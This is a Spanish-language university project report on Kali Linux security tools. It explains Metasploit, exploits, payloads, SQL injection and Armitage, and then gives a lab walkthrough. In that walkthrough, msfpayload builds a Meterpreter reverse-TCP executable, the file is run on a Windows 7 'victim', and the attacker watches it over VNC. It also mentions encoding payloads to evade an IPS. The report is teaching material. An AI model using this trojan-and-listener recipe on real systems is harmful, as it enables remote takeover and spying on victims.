proyecto seguridad

Upload: dario-bravo

Post on 07-Mar-2016

4 views

Category:

Documents


0 download

DESCRIPTION

trabajo

TRANSCRIPT

  • UNIVERSIDAD TCNICA DE MANAB

    FACULTAD DE CIENCIAS INFORMTICAS

    ESCUELA DE INGENIERA EN SISTEMAS INFORMTICOS

    "Forma Ingenieros en Sistemas Informticos de excelencia para servir a la sociedad con eficiencia y transparencia contribuyendo al buen vivir"

    Proyecto Integrador

    Tema: Anlisis e implementacin de herramientas de seguridad en Kali Linux para observar vulnerabilidades existentes de sistemas operativos.

    Seguridad Informtica.

    SPTIMO SEMESTRE PARALELO "A"

    ESTUDIANTES:

    Bravo Bermello Lauro

    Mendoza Arauz David

    Paredes Bravo Jonathan

    Peaherrera Tala Leonardo

    PROFESOR GUA:

    Ing. David Zambrano.

    PERODO ACADMICO:

    OCTUBRE DEL 2015 HASTA FEBRERO DEL 2016

    PORTOVIEJO MANAB ECUADOR

  • Introduccin

    Se entiende por seguridad informtica al conjunto de normas, procedimientos

    y herramientas, que tienen como objetivo garantizar la disponibilidad, integridad,

    confidencialidad y buen uso de la informacin que reside en un sistema de informacin.

    Cada da ms y ms personas mal intencionadas intentan tener acceso a los datos de

    nuestros ordenadores.

    El acceso no autorizado a una red informtica o a los equipos que en ella se encuentran

    puede ocasionar en la gran mayora de los casos graves problemas.

    Uno de las posibles consecuencias de una intrusin es la prdida de datos. Es un hecho

    frecuente y ocasiona muchos trastornos, sobre todo si no estamos al da de las copias de

    seguridad. Y aunque estemos al da, no siempre es posible recuperar la totalidad de los

    datos.

    Otro de los problemas ms dainos es el robo de informacin sensible y confidencial. La

    divulgacin de la informacin que posee una empresa sobre sus clientes puede acarrear

    demandas millonarias contra esta, o un ejemplo mas cercano a usted es el de nuestras

    contraseas de las cuentas de correo por las que intercambiamos informacin con otros.

    Con la constante evolucin de las computadoras es fundamental saber que recursos

    necesitar para obtener seguridad en los sistemas de informacin.

  • Objetivo general:

    Analizar e implementar herramientas de seguridad en Kali Linux para observar vulnerabilidades existentes de sistemas operativos.

    Objetivos especficos.

    El presente proyecto tiene como objetivo comprender los conceptos bsicos de

    seguridad informtica utilizando la herramiento Kali de Linux.

    Describir los principales problemas de seguridad informtica con los que se

    enfrentas los usuarios de computadoras.

    Conocer los conceptos de Integridad, confiabilidad y disponibilidad de la

    informacin.

  • MARCO TEORICO

    Qu es Kali Linux?

    Kali Linux es la nueva generacin del lder en la industria de pruebas de penetracin y

    auditora de seguridad de Linux mejor conocido como BackTrack Linux. Kali es una

    completa re-construccin de BackTrack desde la base hacia arriba, y se adhiere

    completamente a los estndares de desarrollo de Debian.

    Caractersticas de Kali Linux

    Kali Linux es una distribucin de Linux avanzada para pruebas de penetracin y auditoras

    de seguridad.

    Kali es una completa re-construccin de BackTrack Linux desde la base hacia arriba, y se

    adhiere completamente a los estndares de desarrollo de Debian. Toda la nueva

    infraestructura ha sido puesta en el lugar, todas las herramientas fueron revisadas y

    fueron embaladas, y hemos cambiado a Git para nuestro VCS.

    Ms de 300 herramientas de pruebas de penetracin: Despus de revisar todas

    las herramientas que se incluyen en BackTrack, hemos eliminado una gran

    cantidad de herramientas que, o bien no funcionaban o tenan otras herramientas

    disponibles que proporcionan una funcionalidad similar.

    Gratis y siempre lo ser: Kali Linux, al igual que su predecesor, es completamente

    gratis y siempre lo ser. Nunca, jams, tendrs que pagar por Kali Linux.

    Git rbol de cdigo abierto: Somos partidarios enormes de software de cdigo

    abierto y nuestro rbol de desarrollo est disponible para todos y todas las

    fuentes estn disponibles para aquellos que desean modificar y reconstruir

    paquetes.

    Obediente a FHS: Kali ha sido desarrollado para cumplir con el Estndar de

    jerarqua del sistema de ficheros, permitiendo que todos los usuarios de Linux

    puedan localizar fcilmente archivos binarios, archivos de soporte, bibliotecas,

    etc.

  • Amplio apoyo a dispositivos inalmbricos: Hemos construido Kali Linux para que

    soporte tantos dispositivos inalmbricos como sea posible, permitiendo que

    funcione correctamente en una amplia variedad de hardware y hacerlo

    compatible con varios USB y otros dispositivos inalmbricos.

    Kernel personalizado con parches de inyeccin: Como probadores de

    penetracin, el equipo de desarrollo a menudo tiene que hacer evaluaciones

    inalmbricas para que nuestro kernel tenga los ltimos parches de inyeccin

    incluidos.

    Entorno de desarrollo seguro: El equipo de Kali Linux est compuesto por un

    pequeo grupo de personas de confianza que slo puede comprometer e

    interactuar con los paquetes de los repositorios, haciendo uso de mltiples

    protocolos seguros.

    Paquetes firmado con PGP y repos: Todos los paquetes de Kali son firmados por

    cada desarrollador individualmente cuando se construyen y son comprometidos.

    Los repositorios posteriormente firman los paquetes tambin.

    Multi-lenguaje: Aunque las herramientas de penetracin tienden a ser escritas en

    Ingls, nos hemos asegurado de que Kali tenga soporte multilinge, lo que

    permite a ms usuarios poder operar en su idioma nativo y encontrar las

    herramientas necesarias para el trabajo.

    Totalmente personalizable: Estamos completamente conciente de que no todo el

    mundo estar de acuerdo con nuestras decisiones de diseo por lo que hemos

    hecho lo ms fcil posible para nuestros usuarios ms aventureros puedan

    personalizar Kali Linux a su gusto, todo el camino hasta el ncleo.

    Soporte ARMEL y ARMHF: Dado a que los sistemas basados en ARM son cada vez

    ms frecuentes y de bajo costo, sabamos que el soporte de ARM de Kali tendran

    que ser tan robusta como podramos administrar, resultando en instalaciones que

    trabajan en sistemas de ARMEL y ARMHF. Kali Linux tiene repositorios ARM

    integrado con la lnea principal de distribucin de modo que las herramientas para

    ARM sern actualizada en relacin con el resto de la distribucin. Kali est

    disponible para los dispositivos ARM siguientes:

    o rk3306 mk/ss808

    o Raspberry Pi

  • o ODROID U2/X2

    o MK802/MK802 II

    o Samsung Chromebook

    Kali est diseado especficamente para las pruebas de penetracin y, por tanto, toda la

    documentacin de este sitio asume el conocimiento previo del sistema operativo Linux.

    http://es.docs.kali.org/introduction-es/que-es-kali-linux

    Qu es Metasploit?

    El FrameWork de Metasploit es una herramienta de penetracin de cdigo libre,

    desarrollado para ejecutar exploits a un objetivo remoto. Metasploit cuenta con la mayor

    base de datos de exploits pblicos y probados y puede ser usado para detectar las

    vulnerabilidades de nuestros sistemas para protegerlos o usar esas vulnerabilidades para

    obtener acceso a sistemas remotos.

    Es una herramienta bastante poderosa para los test de penetracin y es algo que todo

    profesional de seguridad debe dominar. Puede ser un poco complicado al inicio pero todo

    es cuestin de paciencia y dedicacin.

    El framework de Metasploit ha sido una de las herramientas ms utilizadas por los

    profesionales de seguridad informtica para llevar a cabo sus test de penetracin y

    auditorias de seguridad pero era muy poco conocido. Esa situacin cambio

    significativamente cuando el personal de Offensive Security desarrollo un curso en lnea

    para ensear el uso de esta herramienta.

  • Los pasos bsicos a seguir para explotar las vulnerabilidades usando Metasploit son:

    Elegir y configurar el Exploit ( Codigo que permite aprovechar la vulnerabilidad de

    un sistema)

    Opcionalmente confirmar si el objetivo es susceptible al exploit elegido

    Elegir y configurar el Payload (Codigo que se ejecutara una vez explotemos la

    vulnerabilidad)

    Elegir la tcnica de codificacin para que un IPS ignore el Payload

    Ejectutar el Exploit

    Para poder elegir un exploit y un payload es necesario que contemos con alguna

    informacin del sistema remoto, tal como el Sistema operativo y servicios de red

    instalados. Esto lo podemos obtener con una herramienta de escaneo de puertos y

    Fingerprinting como Nmap.

    Una vez comprometemos y tenemos acceso al sistema remoto hacer bsicamente lo que

    queramos. La idea aqu es que lo usemos para poner a prueba los controles de Seguridad

    que tenemos en nuestra infraestructura y si logramos violar la los controles pues

    podemos crear un plan de accin para mitigar las vulnerabilidades y evitar que sea un

    malintencionado el que logre comprometer nuestros sistemas.

    El framework de Metasploit viene en las distribuciones de seguridad BackTrack y Kali

    Linux y puede ser descargado desde su pagina oficial.

    Ms Adelante estaremos viendo varios tutoriales para que aprendamos a utilizar este

    Framework.

    Si deseas conocer ms o descargar Metasploit, visita su pgina oficia

    Qu es un exploit

    Las definiciones habituales hablan de un programa o cdigo que se aprovecha de un agujero de seguridad (vulnerabilidad) en una aplicacin o sistema, de forma que un atacante podra usarla en su beneficio.

  • Trasladado a la vida real, sera como si un modelo de cerradura (sistema o aplicacin) tuviera un fallo de diseo que nos permitiera crear llaves que la abrieran (exploit) y poder as acceder al sitio que trata de proteger y realizar actos delictivos (malware).

    Existe confusin entre los usuarios y cierto mito de que un exploit puede considerarse malware. La realidad es que, tal y como hemos visto en el ejemplo, no es un cdigo malicioso en s mismo, sino que es la llave para que estos accedan a nuestro sistema.

    De esta forma, puede proporcionarles los permisos necesarios para poder ejecutarse en un sistema e infectarlo aprovechndose de una vulnerabilidad.

    Qu es PayLoad?

    Hablamos que las vulnerabilidades o errores presentes en cualquier software pueden ser

    aprovechadas para producir efectos inesperados en los equipos, una vez descubierto ese

    fallo se desarrollaban pequeos programas (exploits) para forzar de forma especfica ese

    error en el sistema, y ahora qu?

    Adems de conseguir que el software produzca ese error lo ideal sera poder

    aprovecharlo para que el equipo realice las funciones que yo desee.

    Esa parte del software que nos brinda una funcin ante un error es el Payload, la ventaja

    de este planteamiento es que el mismo payload puede ser utilizado por distintos exploits

    y un mismo exploit puede utilizar varios payloads, una programacin modular fantstica.

    Un ejemplo

    Se publica una vulnerabilidad conocida en un servidor web muy utilizado, ...cuando una

    peticin malformada chuchugua, chuchugua llama a la funcin de php no se qu que

    provoca que se pueda X, y permite la ejecucin de cdigo en la maquina del server.

    La comunidad (incluidos los malos) se ponen a trabajar y desarrollan el software (exploit)

    normalmente con lenguajes de programacin rpidos ruby, perl o phyton para provocar

    ese error, adems desarrollan o disean ese software para que el fallo permita sacar

    ventaja, brindarnos una Shell, screenshot, etc. En muchas ocasiones se utilizan

    Payloads ya creados para otros exploits, otras veces hay que disearlos especficamente

    para ese exploit.

  • Inyeccin SQL

    Inyeccin SQL es un mtodo de infiltracin de cdigo intruso que se vale de una

    vulnerabilidad informtica presente en una aplicacin en el nivel de validacin de las

    entradas para realizar operaciones sobre una base de datos.

    El origen de la vulnerabilidad radica en el incorrecto chequeo o filtrado de las variables

    utilizadas en un programa que contiene, o bien genera, cdigo SQL. Es, de hecho, un error

    de una clase ms general de vulnerabilidades que puede ocurrir en cualquier lenguaje de

    programacin o script que est embebido dentro de otro.

    Se conoce como Inyeccin SQL, indistintamente, al tipo de vulnerabilidad, al mtodo de

    infiltracin, al hecho de incrustar cdigo SQL intruso y a la porcin de cdigo incrustado

    Qu es Armitage?

    Armitage es una Herramienta e colaboracin en equipo que permite el uso de Scripts para Metasploit que permite visualizar objetivos, recomienda exploits y expone las caractersticas avanzadas de post-explotacin que tiene el framework.

    A travs de una instancia de metasploit, su equipo (grupo de trabajo) podr realizar lo siguiente:

    Usar las mismas sesiones. Compartir host, datos capturados y archivos descargados. Comunicarse a travs de un registro de eventos compartido. Ejecutar bots para automatizar las tareas del equipo (grupo de trabajo).

  • PRACTICA

    Vulnerando Windows 7 con metaexploit

    Usar el sistema libre kali Linux

    Abrir la consola de kali

    Usar la Shell de msfconsole

    1) Escoger el exploit disponible para Windows

    2) Use exploit/multi/handler

    3) Direccionar la IP del host local

    4) Set LHOST =192.168.67.130

    5) Direccionar el puerto 4321 u otro que no este quemado

    6) Set LPORT 4231

    7) Usar un payload es decir el ataque que trae el exploit

    8) Msfpayload Windows/meterpterter/reverse_tcp LHOST=192.168.67.130 LPORT=4321

    x>/root/prueba.exe

  • Ahora ya tenemos creado un tipo de archivo infectado el cual lo generamos en la carpeta

    personal de kali y se llama prueba.exe

    Despus copiamos el archivo infectado a la maquina victima en este caso es un sistema

    Windows 7

  • Vamos a kali nuevamente y ahora estar escuchando el exploit

    Escribimos exploit en la consola de Kali

    Abrimos en Windows 7 el archivo infectado

    En kali ya estar comprometida la maquina y lista para ser atacada en todos sus arboles de

    procesos

    En la consola si queremos de modo grafico ver lo que la victima hace con el comando run vnc

  • Tambin podemos acceder a los directorios con meterpreter>ps

  • Podemos ver el trafico entre procesos con el wireshark

  • Prctica con inyeccin sql a una pgina web vulnerable

  • Practica con armitaje vulnerando el sistema operativo window 8

  • Conclusiones

    Si bien da a da aparecen nuevos y complejos tipos de incidentes, an se registran

    fallas de seguridad de fcil resolucin tcnica, las cuales ocurren en muchos casos

    por falta de conocimientos sobre los riesgos que acarrean.

    Las organizaciones no pueden permitirse considerar la seguridad como un

    proceso o un producto aislado de los dems. La seguridad tiene que formar parte

    de las organizaciones.

    Debido a la constantes amenazas en que se encuentran los sistemas, es necesario

    que los usuarios y las empresas enfoquen su atencin en el grado de

    vulnerabilidad y en las herramientas de seguridad con las que cuentan para

    hacerle frente a posibles ataques informticos que luego se pueden traducir en

    grandes prdidas.

    Recomendaciones

    Actualice regularmente su sistema

    Instale un Antivirus.

    Instale un Firewall

    Utilice contraseas seguras

    Navegue por pginas web seguras y de confianza.

    Ponga especial atencin en el tratamiento de su correo electrnico

    No abra mensajes de correo de remitentes desconocidos.

    Desconfe de aquellos e-mails en los que entidades bancarias, compaas de

    subastas o sitios de venta online, le solicitan contraseas, informacin

    confidencial, etc.

    WEBGRAFIA:

    http://www.seguridadjabali.com/2012/10/que-es-payload.html

    http://www.jsitech.com/linux/que-es-metasploit/

    http://www.seguridadjabali.com/2012/10/que-es-payload.html